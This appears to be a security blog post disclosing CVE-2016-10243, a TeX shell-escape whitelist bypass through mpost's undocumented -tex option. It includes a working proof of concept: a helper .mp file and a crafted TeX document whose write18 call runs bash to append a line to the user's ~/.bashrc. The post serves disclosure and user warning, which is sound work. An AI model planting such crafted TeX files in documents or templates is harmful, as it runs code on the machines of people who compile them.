Arbitrary code execution in TeX distributions

Many out there use TeX or one of its distributions like TeX Live, LaTex, MiKTeX or teTeX. Sharing TeX files between authors is common, and often conference organizers, journal editors or university institutions offer TeX templates for papers and diploma theses. So what if a TeX file can take over your computer?

The CVE-2016-10243 identifier was just assigned to an “arbitrary code execution” security flaw in multiple TeX distributions like TeX Live and MiKTeX, some of the most comprehensive and widespread TeX distributions available. TeX Live is available in many Linux distributions like Ubuntu, Arch and Fedora. Arbitrary code exection means: an attacker can manipulate a TeX source document which will then make the compiler execute arbitrary commands outside of the scope of generating the usual target document and with the privileges of the current user. So never compile something as root.

The background

TeX has a \write18{} command to enable the execution of commands while a document is being compiled, e.g. to update BibTex indices before they are being used. Because this can lead to security problems, many distributions have a whitelist of well-known, secure external commands. For example Arch (in /usr/share/texmf-dist/web2c/texmf.cnf) and Ubuntu 16.04.2 (in /usr/share/texmf/web2c/texmf.cnf) ship the same configuration, enabling only seven known commands :

% Enable system commands via \write18{...}.  When enabled fully (set to
% t), obviously insecure.  When enabled partially (set to p), only the
% commands listed in shell_escape_commands are allowed.  Although this
% is not fully secure either, it is much better, and so useful that we
% enable it for everything but bare tex.
shell_escape = p

% The programs listed here are as safe as any we know: they either do
% not write any output files, respect openout_any, or have hard-coded
% restrictions similar or higher to openout_any=p.  They also have no
% features to invoke arbitrary other programs, and no known exploitable
% bugs.  All to the best of our knowledge.  They also have practical use
% for being called from TeX.
% 
shell_escape_commands = \
bibtex,bibtex8,\
extractbb,\
kpsewhich,\
makeindex,\
mpost,\
repstopdf,\

So simply trying the following doesn’t work:

\documentclass{minimal}
\begin{document}
  \immediate\write18{echo Hacked}
\end{document}

Things should be safe, right?

The flaw

The problem is that the whitelisted mpost system for creating graphics has a little-known parameter which is not listed in the manpage, but shows up when running mpost -h:

  -tex=TEXPROGRAM           use TEXPROGRAM for text labels

If this parameter is set, mpost will call an external program to handle text labels, and there is no whitelist for this parameter.

mpost needs a minimal input file to continue, so we have to include it with our document. Let’s call it graphics.mp:

verbatimtex
\documentclass{minimal}
\begin{document}
  etex beginfig (1)
  label(btex hacked etex, origin);
  endfig;
\end{document}
bye

Additionally the -interaction=nonstopmode parameter will make sure mpost continues without complaining, and the user will most likely overlook the warnings in the output as long as everything seems to work.

This crafted TeX file will then add the line echo Hacked to ~/.bashrc:

\documentclass{article}
\begin{document}
  \immediate\write18{mpost -ini "-tex=bash -c (echo${IFS}echo${IFS}Hacked)>>${HOME}/.bashrc" -interaction=nonstopmode "graphics.mp"}
\end{document}

The ${IFS} variable substitution is necessary to avoid spaces in the command, and ${HOME} because the ~ special character is not evaluated as usual in this environment. After compiling the document with e.g. pdflatex, you will now see the string Hacked every time you start a terminal or log in.

The flaw has been fixed in TeX Live by a code commit on November 29, 2016 by simply removing mpost from the whitelist, but remains present in many packages shipped with Linux distributions because there was no formal announcement. While Ubuntu 17.04 ships a texlive package built in 2017, older Ubuntu releases and even Arch Linux still ship vulnerable packages.

It’s not the first time

This is not the first time users should be vigilant about TeX files written by strangers. In the Aufgust 2010 issue of the “USENIX ;LOGIN:” magazine, three authors published an article about a TeX virus which will infect all other TeX files within reach.